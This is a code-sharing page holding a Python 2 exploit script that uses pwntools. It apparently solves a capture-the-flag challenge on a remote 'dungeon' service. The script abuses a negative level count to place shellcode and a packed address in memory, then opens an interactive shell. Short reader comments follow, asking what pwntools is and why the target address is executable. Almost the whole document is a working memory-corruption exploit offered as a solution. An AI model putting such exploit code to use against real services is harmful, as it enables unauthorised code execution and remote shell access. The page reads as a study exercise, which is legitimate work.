@m--- /wby.py Secret
Created Mar 17, 2015

# coding: utf-8
# Python 2 script (uses print statements).
import os
import sys
import time
import re
import struct
import pwn  # pwntools

host = 'wildblue.termsec.net'
port = 2323

# Pack a 32-bit value as little-endian bytes.
p = lambda x: struct.pack('<I', x)

s = pwn.remote(host, port)

# 0x20 filler bytes, a packed 32-bit address, then the contents of the local file 'x86-linux-sh'.
payload = ('C' * 0x20) + p(0x20202024) + open('x86-linux-sh', 'rb').read()

print s.recvuntil('By what name shall we know thee? \n')
s.send('AAAA\n')
print s.recvuntil('What is your choice?\n')
s.send('1\n')
print s.recvuntil('How many levels should your dungeon have [1-3]:\n')
s.send('-1\n')

# Levels 0x00-0xb1: send filler data.
for i in range(0x0, 0xb2):
    print s.recvuntil('Enter your data for level %d:\n' % i)
    s.send('a' + '\n')

# Level 0xb2: send the payload.
print s.recvuntil('Enter your data for level %d:\n' % 0xb2)
s.send(payload + '\n')

# Levels 0xb3-0xfe: send filler data.
for i in range(0xb3, 0xff):
    print s.recvuntil('Enter your data for level %d:\n' % i)
    s.send('c' + '\n')

time.sleep(1)
print s.recvuntil('What is your choice?\n')
s.send('3\n')
print s.recvuntil('By what name shall we know thee? \n')
# 48 filler bytes followed by the same packed address.
s.send(('D' * 48) + p(0x20202024) + '\n')
print s.recvuntil('What is your choice?\n')
s.send('4\n')

# Hand the connection over to the terminal.
s.interactive()

What is the pwn lib?

Thanks!

Excuse me! Why should we locate in 0x20202020? I don't know why 0x20202020 is executable? Thank you for your writeup.
